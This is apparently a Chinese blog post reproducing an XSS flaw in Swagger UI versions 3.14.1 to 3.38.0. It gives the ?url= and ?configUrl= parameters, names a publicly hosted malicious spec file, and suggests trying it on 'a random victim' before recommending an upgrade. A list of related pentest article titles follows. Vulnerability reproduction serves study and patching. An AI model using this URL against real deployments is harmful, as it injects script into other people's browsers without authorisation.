swagger xss漏洞复现

扣脚大汉在网络2024-04-27 9:39

swagger xss漏洞复现

文章目录

漏洞介绍

Swagger UI 有一个有趣的功能,允许您提供 API 规范的 URL - 一个 yaml 或 json 文件,将被获取并显示给用户

根本原因非常简单 - 一个过时的库DomPurify

影响版本

XSS 影响的 Swagger UI 版本:>=3.14.1 < 3.38.0

实现原理

利用允许提供json文件的原理访问公网网站进行弹窗

json网站:https://jumpy-floor.surge.sh/test.yaml

拼接方式

?url=https://your_api_spec/spec.yaml

?configUrl=https://your_api_spec/file.json

漏洞复现

随机找一位受害者访问

进行拼接?url=https://jumpy-floor.surge.sh/test.yaml

弹窗

修复建议:

升级到最新

相关推荐
mooyuan天天2 天前
pikachu靶场通关笔记14 XSS关卡10-XSS之js输出(五种方法渗透)
安全·web安全·xss·pikachu靶场·xss漏洞
mooyuan天天3 天前
pikachu靶场通关笔记10 XSS关卡06-XSS之盲打
安全·xss·pikachu靶场·xss漏洞·xss盲打
扛枪的书生3 天前
AD 横向移动-哈希传递攻击
windows·渗透·kali·域渗透
WHOAMI_老猫3 天前
渗透实战PortSwigger Labs AngularJS DOM XSS利用详解
前端·渗透测试·xss·angular.js
DC...3 天前
XSS跨站脚本攻击
前端·xss
mooyuan天天3 天前
pikachu靶场通关笔记12 XSS关卡08-XSS之htmlspecialchars(四种方法渗透)
安全·xss·pikachu靶场·xss漏洞
mooyuan天天3 天前
pikachu靶场通关笔记11 XSS关卡07-XSS之关键字过滤绕过(三种方法渗透)
web安全·xss·pikachu靶场·xss漏洞·xss过滤
穗余5 天前
NodeJS全栈开发面试题讲解——P6安全与鉴权
前端·sql·xss
midsummer_woo5 天前
五、web安全--XSS漏洞(2)--XSS相关payload
安全·web安全·xss
mooyuan天天6 天前
pikachu靶场通关笔记08 XSS关卡04-DOM型XSS
xss·pikachu靶场·dom型xss·xss漏洞
热门推荐
01基于STM32的智能电池管理系统02KGG转MP3工具|非KGM文件|解密音频03YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】04VMware虚拟机安装Win7专业版保姆级教程(附镜像包)05从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑06【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!07【无人机】无人机通信模块,无人机图数传模块的介绍,数传,图传,图传数传一体电台,08DeepSeek各版本说明与优缺点分析09组基轨迹建模 GBTM的介绍与实现(Stata 或 R)10海康Visionmaster-常见问题排查方法-启动阶段